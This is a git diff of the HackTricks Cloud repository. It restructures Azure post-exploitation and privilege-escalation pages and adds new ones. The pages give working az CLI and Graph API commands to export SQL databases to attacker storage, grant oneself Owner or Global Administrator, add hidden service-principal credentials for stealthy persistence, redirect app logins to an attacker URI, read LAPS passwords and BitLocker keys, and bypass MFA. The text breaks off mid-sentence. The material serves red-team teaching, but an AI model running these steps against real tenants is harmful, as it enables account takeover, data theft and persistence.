@@ -58,13 +43,11 @@ az sql elastic-pool update \ --dtu \ --tags ``` -{% endcode %} ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write" With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved. -{% code overflow="wrap" %} ```bash az sql server audit-policy update \ --server \ @@ -73,26 +56,22 @@ az sql server audit-policy update \ --storage-account \ --retention-days 7 ``` -{% endcode %} ### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write" With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings -{% code overflow="wrap" %} ```bash az sql server connection-policy update \ --server \ --resource-group \ --connection-type ``` -{% endcode %} ### "Microsoft.Sql/servers/databases/export/action" With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this. -{% code overflow="wrap" %} ```bash az sql db export \ --server \ 
@@ -104,13 +83,11 @@ az sql db export \ --admin-password ``` -{% endcode %} ### "Microsoft.Sql/servers/databases/import/action" With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server. -{% code overflow="wrap" %} ```bash az sql db import --admin-user \ --admin-password \ @@ -121,20 +98,5 @@ az sql db import --admin-user \ --storage-key \ --storage-uri "https://.blob.core.windows.net/bacpac-container/MyDatabase.bacpac" ``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md new file mode 100644 index 000000000..cdc688716 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md 
@@ -0,0 +1,64 @@
+# Az - Table Storage Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Table Storage Post Exploitation
+
+For more information about table storage check:
+
+{{#ref}}
+../az-services/az-table-storage.md
+{{#endref}}
+
+### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read
+
+A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**.
+
+```bash
+# List tables
+az storage table list --auth-mode login --account-name
+
+# Read table (top 10)
+az storage entity query \
+ --account-name \
+ --table-name \
+ --auth-mode login \
+ --top 10
+```
+
+### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action
+
+A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it).
+
+- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions.
+- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries
+- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries
+
+```bash
+# Add
+az storage entity insert \
+ --account-name \
+ --table-name \
+ --auth-mode login \
+ --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Replace
+az storage entity replace \
+ --account-name \
+ --table-name \
+ --auth-mode login \
+ --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Update
+az storage entity merge \
+ --account-name \
+ --table-name \
+ --auth-mode login \
+ --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+```
+
+### \*/delete
+
+This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
similarity index 61%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
index 08e4f5319..555db9897 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
@@ -1,27 +1,14 @@ # Az - VMs & Network Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## VMs & Network For more info about Azure VMs and networking check the following page: -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} +{{#ref}} +../az-services/vms/ +{{#endref}} ### VM Application Pivoting @@ -84,14 +71,12 @@ az restore-point list \ 2. **Create a disk** from a restore point -{% code overflow="wrap" %} ```bash az disk create \ --resource-group \ --name \ --source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/ ``` -{% endcode %} 3. **Attach the disk to a VM** (the attacker needs to have compromised a VM inside the account already) @@ -104,8 +89,9 @@ az vm disk attach \ 4. **Mount** the disk and **search for sensitive info** -{% tabs %} -{% tab title="Linux" %} +{{#tabs }} +{{#tab name="Linux" }} + ```bash # List all available disks sudo fdisk -l @@ -117,9 +103,11 @@ sudo file -s /dev/sdX sudo mkdir /mnt/mydisk sudo mount /dev/sdX1 /mnt/mydisk ``` -{% endtab %} -{% tab title="Windows" %} +{{#endtab }} + +{{#tab name="Windows" }} + #### **1. Open Disk Management** 1. Right-click **Start** and select **Disk Management**. 
@@ -134,16 +122,16 @@ sudo mount /dev/sdX1 /mnt/mydisk 1. If the disk is not initialized, right-click and select **Initialize Disk**. 2. Choose the partition style: - * **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems. + - **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems. #### **4. Create a New Volume** 1. Right-click the unallocated space on the disk and select **New Simple Volume**. 2. Follow the wizard to: - * Assign a drive letter (e.g., `D:`). - * Format the disk (choose NTFS for most cases). -{% endtab %} -{% endtabs %} + - Assign a drive letter (e.g., `D:`). + - Format the disk (choose NTFS for most cases). + {{#endtab }} + {{#endtabs }} ### Sensitive information in disks & snapshots @@ -175,16 +163,13 @@ It might be possible to find **sensitive information inside VM extensions and VM 1. **List all VM apps** -{% code overflow="wrap" %} ```bash ## List all VM applications inside a gallery az sig gallery-application list --gallery-name --resource-group --output table ``` -{% endcode %} 2. Install the extension in a VM and **search for sensitive info** -{% code overflow="wrap" %} ```bash az vm application set \ --resource-group \ @@ -192,19 +177,5 @@ az vm application set \ --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ --treat-deployment-as-failure true ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
similarity index 100%
rename from pentesting-cloud/azure-security/az-privilege-escalation/README.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
new file mode 100644
index 000000000..acb4d51bb
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
@@ -0,0 +1,39 @@
+# Az - App Services Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Services
+
+For more information about Azure App services check:
+
+{{#ref}}
+../az-services/az-app-service.md
+{{#endref}}
+
+### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read,
+
+These permissions allows to call the following commands to get a **SSH shell** inside a web app
+
+- Direct option:
+
+```bash
+# Direct option
+az webapp ssh --name --resource-group
+```
+
+- Create tunnel and then connect to SSH:
+
+```bash
+az webapp create-remote-connection --name --resource-group
+
+## If successfull you will get a message such as:
+#Verifying if app is running....
+#App is running. Trying to establish tunnel connection...
+#Opening tunnel on port: 39895
+#SSH is available { username: root, password: Docker! }
+
+## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
+ssh root@127.0.0.1 -p 39895
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md similarity index 52% rename from pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md index 804536dc3..e4572f79b 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md @@ -1,38 +1,23 @@ # Az - Azure IAM Privesc (Authorization) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Azure IAM Fore more information check: -{% content-ref url="../az-services/az-azuread.md" %} -[az-azuread.md](../az-services/az-azuread.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-azuread.md +{{#endref}} ### Microsoft.Authorization/roleAssignments/write This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role: -{% code overflow="wrap" %} ```bash # Example az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234" ``` -{% endcode %} ### Microsoft.Authorization/roleDefinitions/Write @@ -45,17 +30,11 @@ Create the file `role.json` with the following **content**: "Name": "", "IsCustom": true, "Description": "Custom role with elevated privileges", - "Actions": [ - "*" - ], + "Actions": ["*"], "NotActions": [], - "DataActions": [ - "*" - ], + "DataActions": ["*"], "NotDataActions": [], - "AssignableScopes": [ - "/subscriptions/" - ] + "AssignableScopes": ["/subscriptions/"] } ``` @@ -69,11 +48,9 @@ az role definition update --role-definition role.json This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources. -{% hint style="success" %} -I think the user need to be Global Administrator in Entrad ID for the elevate call to work. -{% endhint %} +> [!TIP] +> I think the user need to be Global Administrator in Entrad ID for the elevate call to work. -{% code overflow="wrap" %} ```bash # Call elevate az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" 
@@ -81,7 +58,6 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au # Grant a user the Owner role az role assignment create --assignee "" --role "Owner" --scope "/" ``` -{% endcode %} ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write @@ -89,7 +65,6 @@ This permission allows to add Federated credentials to managed identities. E.g. Example command to give access to a repo in Github to the a managed identity: -{% code overflow="wrap" %} ```bash # Generic example: az rest --method PUT \ @@ -103,19 +78,5 @@ az rest --method PUT \ --headers "Content-Type=application/json" \ --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}' ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md similarity index 73% rename from pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index 533dd93bc..c337ced69 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -1,23 +1,9 @@ # Az - EntraID Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +{{#include ../../../../banners/hacktricks-training.md}} -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -{% hint style="info" %} -Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.** -{% endhint %} +> [!NOTE] +> Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.** ## Roles @@ -25,13 +11,13 @@ Note that **not all the granular permissions** built-in roles have in Entra ID * This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges. -* Assign role to a user: +- Assign role to a user: ```bash # List enabled built-in roles az rest --method GET \ --uri "https://graph.microsoft.com/v1.0/directoryRoles" - + # Give role (Global Administrator?) to a user roleId="" userId="" @@ -43,7 +29,7 @@ az rest --method POST \ }" ``` -* Add more permissions to a role: +- Add more permissions to a role: ```bash # List only custom roles @@ -52,7 +38,7 @@ az rest --method GET \ # Change the permissions of a custom role az rest --method PATCH \ - --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ --headers "Content-Type=application/json" \ --body '{ "description": "Update basic properties of application registrations", 
@@ -105,14 +91,12 @@ An attacker can add a redirect URI to applications that are being used by users Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions. -{% code overflow="wrap" %} ```bash # Get current redirect uris az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" # Add a new redirect URI (make sure to keep the configured ones) -az ad app update --id --web-redirect-uris "https://original.com/callback https://attack.com/callback" +az ad app update --id --web-redirect-uris "https://original.com/callback https://attack.com/callback" ``` -{% endcode %} ## Service Principals 
@@ -124,18 +108,15 @@ This allows an attacker to add credentials to existing service principals. If th az ad sp credential reset --id --append ``` -{% hint style="danger" %} -The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\ -From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` -{% endhint %} +> [!CAUTION] +> The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\ +> From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute: -{% code overflow="wrap" %} ```bash az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}' ``` -{% endcode %} ### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage` 
@@ -166,9 +147,8 @@ az ad sp credential reset --id --append az ad sp owner list --id ``` -{% hint style="danger" %} -After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**. -{% endhint %} +> [!CAUTION] +> After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**. ### `microsoft.directory/servicePrincipals/disable` and `enable` @@ -188,7 +168,6 @@ az ad sp update --id --account-enabled true These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications. -{% code overflow="wrap" %} ```bash # Generate SSO creds for a user or a group spID="" @@ -208,9 +187,8 @@ az rest --method POST \ --headers "Content-Type=application/json" \ --body "{\"id\": \"$credID\"}" ``` -{% endcode %} -*** +--- ## Groups @@ -264,9 +242,9 @@ az rest --method PATCH \ It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check: -{% content-ref url="dynamic-groups.md" %} -[dynamic-groups.md](dynamic-groups.md) -{% endcontent-ref %} +{{#ref}} +dynamic-groups.md +{{#endref}} ## Users @@ -282,7 +260,6 @@ az ad user update --id --password "kweoifuh.234" This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges. -{% code overflow="wrap" %} ```bash #e.g. change manager of a user victimUser="" 
@@ -291,22 +268,21 @@ az rest --method PUT \ --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \ --headers "Content-Type=application/json" \ --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}' - + #e.g. change department of a user az rest --method PATCH \ --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \ --headers "Content-Type=application/json" \ --body "{\"department\": \"security\"}" ``` -{% endcode %} ## Conditional Access Policies & MFA bypass Misconfigured conditional access policies requiring MFA could be bypassed, check: -{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %} -[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md) -{% endcontent-ref %} +{{#ref}} +az-conditional-access-policies-mfa-bypass.md +{{#endref}} ## Devices @@ -340,9 +316,8 @@ az rest --method POST \ This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password -{% code overflow="wrap" %} ```bash -# List deviceLocalCredentials +# List deviceLocalCredentials az rest --method GET \ --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials" @@ -351,7 +326,6 @@ deviceLC="" az rest --method GET \ --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \ ``` -{% endcode %} ## BitlockerKeys @@ -359,7 +333,6 @@ az rest --method GET \ This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality. -{% code overflow="wrap" %} ```bash # List recovery keys az rest --method GET \ 
@@ -370,29 +343,15 @@ recoveryKeyId="" az rest --method GET \ --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key" ``` -{% endcode %} ## Other Interesting permissions (TODO) -* `microsoft.directory/applications/permissions/update` -* `microsoft.directory/servicePrincipals/permissions/update` -* `microsoft.directory/applications.myOrganization/allProperties/update` -* `microsoft.directory/applications/allProperties/update` -* `microsoft.directory/servicePrincipals/appRoleAssignedTo/update` -* `microsoft.directory/applications/appRoles/update` -* `microsoft.directory/applications.myOrganization/permissions/update` +- `microsoft.directory/applications/permissions/update` +- `microsoft.directory/servicePrincipals/permissions/update` +- `microsoft.directory/applications.myOrganization/allProperties/update` +- `microsoft.directory/applications/allProperties/update` +- `microsoft.directory/servicePrincipals/appRoleAssignedTo/update` +- `microsoft.directory/applications/appRoles/update` +- `microsoft.directory/applications.myOrganization/permissions/update` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md similarity index 67% rename from pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index c58c50947..498bc7d2a 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -1,19 +1,6 @@ # Az - Conditional Access Policies & MFA Bypass -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -33,16 +20,16 @@ When configuring a conditional access policy it's needed to indicate the **users It's also needed to configure the **conditions** that will **trigger** the policy: -* **Network**: Ip, IP ranges and geographical locations - * Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address -* **Microsoft risks**: User risk, Sign-in risk, Insider risk -* **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux - * If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms -* **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients” - * To bypass login with a not selected option -* **Filter for devices**: It’s possible to generate a rule related the used device -* A**uthentication flows**: Options are “Device code flow” and “Authentication transfer” - * This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account +- **Network**: Ip, IP ranges and geographical locations + - Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address +- **Microsoft risks**: User risk, Sign-in risk, Insider risk +- **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux + - If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms +- **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients” + - To bypass login with a not selected option +- **Filter for devices**: It’s possible to generate a rule related the used device +- A**uthentication flows**: Options are “Device code flow” and “Authentication transfer” + - 
This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account The possible **results** are: Block or Grant access with potential conditions like require MFA, device to be compliant… @@ -50,12 +37,12 @@ The possible **results** are: Block or Grant access with potential conditions li It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block: -
+
Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\ You can change the user agent **manually** in the developer tools: -
+
Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). @@ -67,20 +54,18 @@ If this is set in the conditional policy, an attacker could just use a **VPN** i It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**: -
+
To try to bypass this protection you should see if you can **only into any application**.\ The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful. In order to **test specific application IDs in specific resources** you could also use a tool such as: -{% code overflow="wrap" %} ```bash roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout ``` -{% endcode %} Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also. @@ -94,9 +79,8 @@ The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**. -{% hint style="danger" %} -As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail. -{% endhint %} +> [!CAUTION] +> As chars are just **tones**, an attacker could 